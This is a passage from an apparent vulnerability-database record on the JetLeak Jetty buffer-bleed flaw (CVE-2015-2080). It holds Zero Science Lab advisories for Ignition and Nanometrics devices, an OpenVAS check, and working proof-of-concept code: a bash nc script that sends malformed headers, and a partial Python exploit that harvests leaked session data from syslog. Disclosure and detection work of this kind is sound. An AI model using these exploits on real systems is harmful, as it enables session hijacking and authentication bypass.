used\nto parse through the HTTP headers and their associated values. The server\nbegins by looping through each character for a given header value and checks\nthe following:\n\n- On Line 1164, the server checks if the character is printable ASCII or\nnot a valid ASCII character.\n- On Line 1172, the server checks if the character is a space or tab.\n- On Line 1175, the server checks if the character is a line feed.\n- If the character is non-printable ASCII (less than 0x20 and not a space,\ntab or line feed), then none of the checks above match and the code throws an\n'IllegalCharacter' exception on line 1186, passing in the illegal character\nand the shared request buffer.\n\n\n---------------------------------------------------------------------------\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\n---------------------------------------------------------------------------\n920: protected boolean parseHeaders(ByteBuffer buffer)\n921: {\n[..snip..]\n1163: case HEADER_VALUE:\n1164: if (ch>HttpTokens.SPACE || ch<0)\n1165: {\n1166: _string.append((char)(0xff&ch));\n1167: _length=_string.length();\n1168: setState(State.HEADER_IN_VALUE);\n1169: break;\n1170: }\n1171:\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\n1173: break;\n1174:\n1175: if (ch==HttpTokens.LINE_FEED)\n1176: {\n1177: if (_length > 0)\n1178: {\n1179: _value=null;\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\n1181: }\n1182: setState(State.HEADER);\n1183: break;\n1184: }\n1185:\n1186: throw new IllegalCharacter(ch,buffer);\n---------------------------------------------------------------------------\n\n\nTested on: Microsoft Windows 7 Professional SP1 (EN)\n Microsoft Windows 7 Ultimate SP1 (EN)\n Ubuntu Linux 14.04\n Mac OS X\n HP-UX Itanium\n Jetty(9.2.z-SNAPSHOT)\n Java/1.8.0_73\n Java/1.8.0_66\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2016-5306\nAdvisory URL: 
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\n\nCVE: CVE-2015-2080\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\n\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n\n\n14.01.2016\n\n---\n\n\n#######################\n#!/bin/bash\n\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\nBAD=$'\\a'\n\nfunction normalRequest {\necho \"-- Normal Request --\"\n\nnc localhost 8088 << NORMREQ\nPOST $RESOURCEPATH HTTP/1.1\nHost: localhost\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\nConnection: close\nContent-Length: 63\n\nNORMREQ\n}\n\nfunction badCookie {\necho \"-- Bad Cookie --\"\n\nnc localhost 8088 << BADCOOKIE\nGET $RESOURCEPATH HTTP/1.1\nHost: localhost\nCoo${BAD}kie: ${BAD}\n\nBADCOOKIE\n}\n\nnormalRequest\necho \"\"\necho \"\"\nbadCookie\n\n#######################\n\n\n\nOriginal raw analysis request via proxy using Referer:\n------------------------------------------------------\n\nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\nHost: localhost:8088\nAccept: application/xml, text/xml, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nWicket-Ajax: true\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\nWicket-Ajax-BaseURL: config/conf.modules?51461\nReferer: \\x00\n\n\nResponse leaking part of Cookie session:\n----------------------------------------\n\nHTTP/1.1 
400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\nContent-Length: 0\nConnection: close\nServer: Jetty(9.2.z-SNAPSHOT)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:36:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "description": "The remote host is missing an update for the 'jetty' package(s) announced via the referenced advisory (FEDORA-2015-2673).", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869526", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869526", "type": "openvas", "title": "Fedora Update for jetty FEDORA-2015-2673", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jetty FEDORA-2015-2673\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869526\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:22:17 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-2080\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jetty FEDORA-2015-2673\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jetty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jetty on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-2673\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"jetty\", rpm:\"jetty~9.2.9~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2020-03-10T23:26:07", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "edition": 2, "modified": "2019-07-03T21:02:04", "published": "2018-11-09T17:50:00", "id": "GHSA-GHGJ-3XQR-6JFM", "href": "https://github.com/advisories/GHSA-ghgj-3xqr-6jfm", "title": "Moderate severity vulnerability that affects org.eclipse.jetty:jetty-server", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zeroscience": [{"lastseen": "2020-11-06T21:17:27", "description": "Title: Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers \nAdvisory ID: [ZSL-2016-5306](<ZSL-2016-5306.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information \nRisk: (3/5) \nRelease Date: 16.02.2016 \n\n\n##### Summary\n\nIgnition is a powerful industrial application platform with fully integrated development tools for building SCADA, MES, and IIoT solutions. \n\n##### Description\n\nRemote unauthenticated atackers are able to read arbitrary data from other HTTP sessions because Ignition uses a vulnerable Jetty server. When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. 
The server begins by looping through each character for a given header value and checks the following: \n \n\\- On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character. \n\\- On Line 1172, the server checks if the character is a space or tab. \n\\- On Line 1175, the server checks if the character is a line feed. \n\\- If the character is non-printable ASCII (or less than 0x20), then all of the checks above are skipped over and the code throws an 'IllegalCharacter' exception on line 1186, passing in the illegal character and a shared buffer. \n \n\\-------------------------------------------------------------------------------- \n \n` File: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java \n--------------------------------------------------------------------------- \n920: protected boolean parseHeaders(ByteBuffer buffer) \n921: { \n[..snip..] \n1163: case HEADER_VALUE: \n1164: if (ch>HttpTokens.SPACE || ch<0) \n1165: { \n1166: _string.append((char)(0xff&ch)); \n1167: _length=_string.length(); \n1168: setState(State.HEADER_IN_VALUE); \n1169: break; \n1170: } \n1171: \n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) \n1173: break; \n1174: \n1175: if (ch==HttpTokens.LINE_FEED) \n1176: { \n1177: if (_length > 0) \n1178: { \n1179: _value=null; \n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString()); \n1181: } \n1182: setState(State.HEADER); \n1183: break; \n1184: } \n1185: \n1186: throw new IllegalCharacter(ch,buffer); \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nInductive Automation - <http://www.inductiveautomation.com>\n\n##### Affected Version\n\n7.8.1 (b2016012216) and 7.8.0 (b2015101414) \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \nUbuntu Linux 14.04 \nMac OS X \nHP-UX Itanium \nJetty(9.2.z-SNAPSHOT) \nJava/1.8.0_73 \nJava/1.8.0_66 
\n\n##### Vendor Status\n\n[14.01.2016] Vulnerability discovered. \n[20.01.2016] Vendor contacted. \n[15.02.2016] No response from the vendor. \n[16.02.2016] Public security advisory released. \n[22.02.2016] Vendor informs that version 7.8.1 is patched with Jetty 9.3.3v20150827. \n\n##### PoC\n\n[ignition_bufferbleed.txt](<../../codes/ignition_bufferbleed.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html> \n[2] <https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py> \n[3] <http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md> \n[4] <https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md> \n[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080> \n[6] <https://cxsecurity.com/issue/WLB-2016020156> \n[7] <https://packetstormsecurity.com/files/135804> \n[8] <https://www.exploit-db.com/exploits/39455/> \n[9] <http://www.vfocus.net/art/20160222/12576.html> \n[10] [https://www.incibe.es/securityAdvice/CERT_en/ics_advisories/Inductive_Automation_Ignition](<https://www.incibe.es/securityAdvice/CERT_en/Early_warning/ics_advisories/Fuga_datos_Inductive_Automation_Ignition>)\n\n##### Changelog\n\n[16.02.2016] - Initial release \n[17.02.2016] - Added reference [6] and [7] \n[18.02.2016] - Added reference [8] \n[22.02.2016] - Added vendor status and reference [9] and [10] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 13, "published": "2016-02-16T00:00:00", "title": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": 
["CVE-2015-2080"], "modified": "2016-02-16T00:00:00", "id": "ZSL-2016-5306", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php", "sourceData": "\r\nInductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\r\n\r\n\r\nVendor: Inductive Automation\r\nProduct web page: http://www.inductiveautomation.com\r\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\r\nPlatform: Java\r\n\r\nSummary: Ignition is a powerful industrial application platform with\r\nfully integrated development tools for building SCADA, MES, and IIoT\r\nsolutions.\r\n\r\nDesc: Remote unauthenticated atackers are able to read arbitrary data\r\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\r\nWhen the Jetty web server receives a HTTP request, the below code is used\r\nto parse through the HTTP headers and their associated values. The server\r\nbegins by looping through each character for a given header value and checks\r\nthe following:\r\n\r\n- On Line 1164, the server checks if the character is printable ASCII or\r\nnot a valid ASCII character.\r\n- On Line 1172, the server checks if the character is a space or tab.\r\n- On Line 1175, the server checks if the character is a line feed.\r\n- If the character is non-printable ASCII (or less than 0x20), then all\r\nof the checks above are skipped over and the code throws an 'IllegalCharacter'\r\nexception on line 1186, passing in the illegal character and a shared buffer.\r\n\r\n\r\n---------------------------------------------------------------------------\r\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\r\n---------------------------------------------------------------------------\r\n920: protected boolean parseHeaders(ByteBuffer buffer)\r\n921: {\r\n[..snip..]\r\n1163: case HEADER_VALUE:\r\n1164: if (ch>HttpTokens.SPACE || ch<0)\r\n1165: {\r\n1166: _string.append((char)(0xff&ch));\r\n1167: _length=_string.length();\r\n1168: 
setState(State.HEADER_IN_VALUE);\r\n1169: break;\r\n1170: }\r\n1171:\r\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\r\n1173: break;\r\n1174:\r\n1175: if (ch==HttpTokens.LINE_FEED)\r\n1176: {\r\n1177: if (_length > 0)\r\n1178: {\r\n1179: _value=null;\r\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\r\n1181: }\r\n1182: setState(State.HEADER);\r\n1183: break;\r\n1184: }\r\n1185:\r\n1186: throw new IllegalCharacter(ch,buffer);\r\n---------------------------------------------------------------------------\r\n\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n Ubuntu Linux 14.04\r\n Mac OS X\r\n HP-UX Itanium\r\n Jetty(9.2.z-SNAPSHOT)\r\n Java/1.8.0_73\r\n Java/1.8.0_66\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2016-5306\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\r\n\r\nCVE: CVE-2015-2080\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\r\n\r\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\r\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\n14.01.2016\r\n\r\n---\r\n\r\n\r\n#######################\r\n#!/bin/bash\r\n\r\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\r\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\r\nBAD=$'\\a'\r\n\r\nfunction normalRequest {\r\necho \"-- Normal Request --\"\r\n\r\nnc localhost 8088 << NORMREQ\r\nPOST $RESOURCEPATH HTTP/1.1\r\nHost: 
localhost\r\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\r\nConnection: close\r\nContent-Length: 63\r\n\r\nNORMREQ\r\n}\r\n\r\nfunction badCookie {\r\necho \"-- Bad Cookie --\"\r\n\r\nnc localhost 8088 << BADCOOKIE\r\nGET $RESOURCEPATH HTTP/1.1\r\nHost: localhost\r\nCoo${BAD}kie: ${BAD}\r\n\r\nBADCOOKIE\r\n}\r\n\r\nnormalRequest\r\necho \"\"\r\necho \"\"\r\nbadCookie\r\n\r\n#######################\r\n\r\n\r\n\r\nOriginal raw analysis request via proxy using Referer:\r\n------------------------------------------------------\r\n\r\nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\r\nHost: localhost:8088\r\nAccept: application/xml, text/xml, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nWicket-Ajax: true\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\r\nWicket-Ajax-BaseURL: config/conf.modules?51461\r\nReferer: \\x00\r\n\r\n\r\nResponse leaking part of Cookie session:\r\n----------------------------------------\r\n\r\nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\r\nContent-Length: 0\r\nConnection: close\r\nServer: Jetty(9.2.z-SNAPSHOT)\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/ignition_bufferbleed.txt"}, {"lastseen": "2020-11-06T21:17:46", "description": "Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \nAdvisory ID: [ZSL-2020-5562](<ZSL-2020-5562.php>) \nType: Local/Remote \nImpact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information \nRisk: (5/5) \nRelease Date: 15.02.2020 \n\n\n##### Summary\n\nThe Centaur digital recorder is a portable geophysical sensing acquisition system 
that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. \n \nThe TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. \n\n##### Description\n\nAn information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. \n\n##### Vendor\n\nNanometrics Inc. - <https://www.nanometrics.ca>\n\n##### Affected Version\n\nCentaur <= 4.3.23 \nTitanSMA <= 4.2.20 \n\n##### Tested On\n\nJetty 9.4.z-SNAPSHOT \n\n##### Vendor Status\n\n[10.02.2020] Vulnerabilities discovered. \n[10.02.2020] Vendor contacted. \n[14.02.2020] No response from the vendor. \n[15.02.2020] Public security advisory released. 
\n\n##### PoC\n\n[centaur3.py](<../../codes/centaur3.txt>)\n\n##### Credits\n\nVulnerability discovered by byteGoblin - <[bytegoblin@zeroscience.mk](<mailto:bytegoblin@zeroscience.mk>)>\n\n##### References\n\n[1] <https://nvd.nist.gov/vuln/detail/CVE-2015-2080> \n[2] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php> \n[3] <https://packetstormsecurity.com/files/156387> \n[4] <https://cxsecurity.com/issue/WLB-2020020091> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/176352> \n[6] <https://www.exploit-db.com/exploits/48098> \n[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12134> \n[8] <https://nvd.nist.gov/vuln/detail/CVE-2020-12134>\n\n##### Changelog\n\n[15.02.2020] - Initial release \n[19.02.2020] - Added reference [3], [4], [5] and [6] \n[26.04.2020] - Added reference [7] and [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 1, "published": "2020-02-15T00:00:00", "title": "Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12134", "CVE-2015-2080"], "modified": "2020-02-15T00:00:00", "id": "ZSL-2020-5562", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php", "sourceData": "#!/usr/bin/env python3\n#\n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit\n#\n#\n# Vendor: Nanometrics Inc.\n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n#\n# Affected versions:\n# Centaur <= 4.3.23\n# TitanSMA <= 4.2.20\n#\n# Summary:\n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists\n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.\n# Its ease of use simplifies high performance 
geophysical sensing deplayments in both remote and\n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for\n# infrasound and similar geophysical sensor recording applications requiring sample rates up to\n# 5000 sps.\n#\n# Summary:\n# The TitanSMA is a strong motion accelerograph designed for high precision observational and\n# structural engineering applications, where scientists and engineers require exceptional dynamic\n# range over a wide frequency band.\n#\n# Description:\n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect\n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)\n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.\n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.\n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP\n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system\n# logs. 
Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent\n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking\n# and authentication bypass scenarios.\n#\n# Tested on:\n# Jetty 9.4.z-SNAPSHOT\n#\n# Vulnerability discovered by:\n# byteGoblin @ zeroscience.mk\n#\n#\n# Advisory ID: ZSL-2020-5562\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n#\n# Related CVE: CVE-2015-2080\n# Related CWE: CWE-532, CWE-538\n#\n# 10.02.2020\n#\n\nimport requests\nimport re\nimport sys\n\nclass Goblin:\n def __init__(self):\n self.host = None\n self.page = \"/zsl\"\n self.syslog = \"/logs/syslog\"\n self.buffer_pad = \"A\" * 70\n self.buffer = None\n self.payload = \"\\xFF\"\n self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results\n self.body = {}\n self.headers = None\n self.syslog_data = {}\n self.last_line = None\n self.before_last_line = True\n\n def banner(self):\n goblin = \"\"\"\n NN \n NkllON \n 0;;::k000XN KxllokN \n 0;,:,;;;;:ldK Kdccc::oK \n Nx,';codddl:::dkdc:c:;lON \n klc:clloooooooc,.':lc;'lX \n x;:ooololccllc:,:ll:,:xX \n Kd:cllc'..';:ccclc,.x _ . ___ _ . \n NOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \n Nklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `.\n 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |\n 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / |\n Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \n Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//\n XxclkXk;'::,,,''';:::;'''...'',:o0 \n Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin\n O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk\n Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \n d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. 
- nanometrics.ca\n Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA\n d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20\n 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK\n 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A\n 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \n x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product\n Xx:,'':xk:..,''lK Y k;';;';xX \n XOkkko'.....'O d.';;,,:xN\n 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._\n XOkkkkkON \n \"\"\"\n print(goblin)\n\n def generate_payload(self, amount_of_bytes):\n self.payload += \"\\x00\" * amount_of_bytes\n self.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload}\n\n def read_syslog(self, initial=False):\n # Read syslog remotely and filter out 'HeapByteBuffer' messages.\n # 'initial' is used to make a 'snapshot' of the state before we send payloads...\n # That way we can filter on what we've just sent.\n print(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog))\n buffer = \"\"\n r = requests.get(self.host + self.syslog)\n if r.status_code == 200:\n print(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content)))\n split = r.text.split(\"\\n\")\n for line in split:\n if \"HeapByteBuffer\" in line:\n if initial:\n self.last_line = line\n else:\n if line == self.last_line:\n self.before_last_line = False\n if not self.before_last_line:\n buffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\")\n try:\n leak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\")\n buffer += leak\n except Exception as e:\n print(e)\n if initial:\n return self.last_line\n self.buffer = buffer\n else: # we can't access syslog?\n print(\"[!!!] - Yoooo... we can't access syslog? 
Make sure you can access it, dawg...\")\n print(\"[!!!] - The status code we got was: {}\".format(r.status_code))\n exit(-1)\n\n def show_output(self):\n # we need to translate '\\r\\n' into actual newlines\n if self.buffer is not None and self.buffer is not \"\":\n self.buffer = self.buffer.replace(\"\\\\n\", \"\\n\")\n self.buffer = self.buffer.replace(\"\\\\r\", \"\\r\")\n self.buffer = self.buffer.replace(\"%2f\", \"/\")\n\n print(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer)))\n print(\"=\" * 50)\n print(\"[*] THIS IS THE LOOT\")\n print(\"=\" * 50)\n for num, x in enumerate(self.buffer.split(\"\\n\")):\n print(\"{}.\\t| \\t{}\".format(num, x))\n\n def send_payload(self, amount):\n print(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page))\n if amount > self.payloads_to_send or amount < 0:\n amount = self.payloads_to_send\n for num, x in enumerate(range(0, amount)):\n if num % 10 == 0:\n print(\"[!] - [{}/{}] payloads sent...\".format(num, amount))\n try:\n self.generate_payload(17)\n r = requests.post(self.host + self.page, data=self.body, headers=self.headers)\n except Exception as e:\n print(e)\n print(\"[!] 
